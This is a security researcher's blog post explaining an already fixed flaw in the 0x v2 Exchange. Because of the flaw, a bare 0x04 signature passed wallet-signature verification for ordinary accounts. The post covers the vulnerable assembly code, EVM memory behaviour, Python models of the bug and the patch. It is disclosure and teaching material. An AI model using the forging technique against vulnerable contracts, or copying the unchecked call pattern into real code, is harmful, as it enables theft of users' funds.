The 0x vulnerability, explained
samczsun.com, Sun, 14 Jul 2019 02:28:27 GMT
https://samczsun.com/the-0x-vulnerability-explained/

On Friday July 12th, 0x shut down their v2 Exchange because a flaw in the signature verification routine meant that a signature of 0x04 was treated as a valid signature for all non-smart-contract accounts. This blog post explains how this is possible.

Background

0x is, when grossly oversimplified, a platform which allows users to trade with other users. If Alice wants to buy 1000 ZRX for 1 ETH, Alice can submit an order through the 0x protocol. If Bob then decides that he wants to take Alice's order, he can use 0x's Exchange contract to securely perform the exchange.

In order for the Exchange to make sure that Alice really did make the offer that Bob claims she's making, Bob needs to submit Alice's signature with the order data. This signature is the only thing preventing Bob from claiming that Alice is offering 1000000 ZRX for 1 wei, so it's imperative that signatures can't be forged.

0x supports several types of signatures. EIP712 and EthSign signatures are based on ECDSA signatures and are cryptographically secure, while Wallet and Validator signatures query an address for the validity of the provided signature. The Wallet signature in particular will query the signer address itself, and is intended to allow multi-signature wallets to make trades.

The Code

Let's take a look at how 0x verifies a Wallet signature.

function isValidWalletSignature(
    bytes32 hash,
    address walletAddress,
    bytes signature
)
    internal
    view
    returns (bool isValid)
{
    bytes memory calldata = abi.encodeWithSelector(
        IWallet(walletAddress).isValidSignature.selector,
        hash,
        signature
    );
    assembly {
        let cdStart := add(calldata, 32)
        let success := staticcall(
            gas,              // forward all gas
            walletAddress,    // address of Wallet contract
            cdStart,          // pointer to start of input
            mload(calldata),  // length of input
            cdStart,          // write output over input
            32                // output size is 32 bytes
        )

        switch success
        case 0 {
            // Revert with `Error("WALLET_ERROR")`
            /* snip */
            revert(0, 100)
        }
        case 1 {
            // Signature is valid if call did not revert and returned true
            isValid := mload(cdStart)
        }
    }
    return isValid;
}
Source

If we ignore the fact that this was written in inline assembly, it's fairly straightforward. First, abi.encodeWithSelector constructs the ABI-encoded calldata which will be sent to the wallet. The staticcall then performs the call to the wallet. Finally, the switch on success checks whether the call succeeded, and loads the returned boolean.

The Problem

While the code to validate a Wallet signature was simple enough, it was written without knowledge of at least one of these two subtleties of the EVM:

1. Executing instructions outside the code is equivalent to executing STOP instructions

In most modern computers, executing undefined instructions means that your computer will execute garbage until the program crashes. However, the EVM is special because if execution happens to go outside the code of the smart contract, it's implicitly treated as a STOP instruction.

[Yellow Paper, Section 9.4]

A side effect of this is that accounts with no code can still be executed - they'll just immediately halt.

2. While the CALL family of instructions allow specifying where the output should be copied, the output area is not cleared beforehand

Take a look at this excerpt from the formal definition of the CALL instruction, where µ[5] is where in memory the return data should be copied, µ[6] is the length of the return data to be copied, and o is the data returned by the CALL instruction.

[Yellow Paper, Appendix H]

This states that only n bytes will be copied from the returned data to main memory, where n is the minimum of the number of bytes expected and the number of bytes returned. This implies that if fewer bytes are returned than expected, only the bytes actually returned will be copied to memory, leaving the rest of the output area untouched.

Going back to the validation routine, the authors instructed the EVM to overwrite the input data with the returned data, likely to save gas. Under normal operation, given a hash of 0xAA...AA and a signature of 0x1CFF...FF, the memory before and after a call might look something like this.

[diagram: memory before the call]
[diagram: memory after the call, with the return data overwriting the input]

However, if there was no data returned by the call, then the memory after the call would look like this:

[diagram: memory after the call, unchanged]

In other words, the memory is unchanged. Now, when mload(cdStart) loads the first 32 bytes into a boolean variable, the nonzero value is coerced into true. Then, this true is returned from the function, indicating that "yes, the signature provided is fine" when it clearly isn't.
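
These two subtleties combine as follows, sketched here in Python rather than EVM terms. The input buffer is simplified (the real calldata starts with the 4-byte selector followed by the hash), but the copy rule is the relevant part:

```python
# Sketch of CALL's copy rule: only min(expected, returned) bytes of return
# data are written, so an empty return leaves the input bytes in place.
def fake_staticcall(memory, out_start, out_size, returndata):
    n = min(out_size, len(returndata))       # Yellow Paper: min of expected and |o|
    memory[out_start:out_start + n] = returndata[:n]
    return True                              # a call to a codeless account succeeds

# Simplified input buffer: nonzero ABI-encoded call data (selector + hash)
memory = bytearray(b"\xaa" * 32 + b"\x11" * 32)

# EOA: no code to run, so no return data at all
fake_staticcall(memory, out_start=0, out_size=32, returndata=b"")

is_valid = int.from_bytes(memory[:32], "big") != 0  # mload + bool coercion
assert is_valid  # stale input bytes read back as "true"
```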

As for why the magic signature of 0x04 is always considered valid, it's because 0x04 is the ID number for a Wallet type signature, and the signature type is the last byte in the signature array.

// Allowed signature types.
enum SignatureType {
    Illegal,         // 0x00, default value
    Invalid,         // 0x01
    EIP712,          // 0x02
    EthSign,         // 0x03
    Wallet,          // 0x04
    Validator,       // 0x05
    PreSigned,       // 0x06
    NSignatureTypes  // 0x07, number of signature types. Always leave at end.
}
Source
function isValidSignature(
    bytes32 hash,
    address signerAddress,
    bytes memory signature
)
    public
    view
    returns (bool isValid)
{
    /* snip */

    // Pop last byte off of signature byte array.
    uint8 signatureTypeRaw = uint8(signature.popLastByte());
    
    /* snip */

    SignatureType signatureType = SignatureType(signatureTypeRaw);
    
    /* snip */
    if (signatureType == SignatureType.Wallet) {
        isValid = isValidWalletSignature(
            hash,
            signerAddress,
            signature
        );
        return isValid;
    }
    /* snip */
}
Source
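
Putting it together, the parsing of a bare 0x04 signature can be sketched as follows, mirroring popLastByte and the enum above:

```python
# Sketch of why a bare 0x04 signature reaches isValidWalletSignature:
# the last byte selects the type, and what's left is an empty signature.
SIGNATURE_TYPES = ["Illegal", "Invalid", "EIP712", "EthSign",
                   "Wallet", "Validator", "PreSigned"]

signature = bytes([0x04])
sig_type = SIGNATURE_TYPES[signature[-1]]  # popLastByte reads the last byte
remaining = signature[:-1]                 # empty "signature" is left over

assert sig_type == "Wallet"
assert remaining == b""
# The empty signature is then forwarded to the signer address itself,
# which for an EOA has no code and returns nothing.
```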

The Solution

To their credit, 0x triaged and fixed this vulnerability in a couple of hours. The relevant commit can be viewed here, but there's really only two sections of interest.

The first change requires that the wallet address contains some code. This behavior matches what the Solidity compiler inserts before performing a function call.

if iszero(extcodesize(walletAddress)) {
    // Revert with `Error("WALLET_ERROR")`
    /* snip */
    revert(0, 100)
}

The second change requires the return data to be exactly 32 bytes long. This is also what the Solidity compiler inserts after performing a function call.

if iszero(eq(returndatasize(), 32)) {
    // Revert with `Error("WALLET_ERROR")`
    /* snip */
    revert(0, 100)
}

Conclusion

This isn't the first time that an EVM subtlety has bitten a smart contract developer, and it won't be the last. However, it's usually through incidents like this that we all learn about a new dangerous pattern to watch out for. Hopefully through this incident, future developers and auditors will be able to catch similar problems before they make it to mainnet.

Further Reading

]]>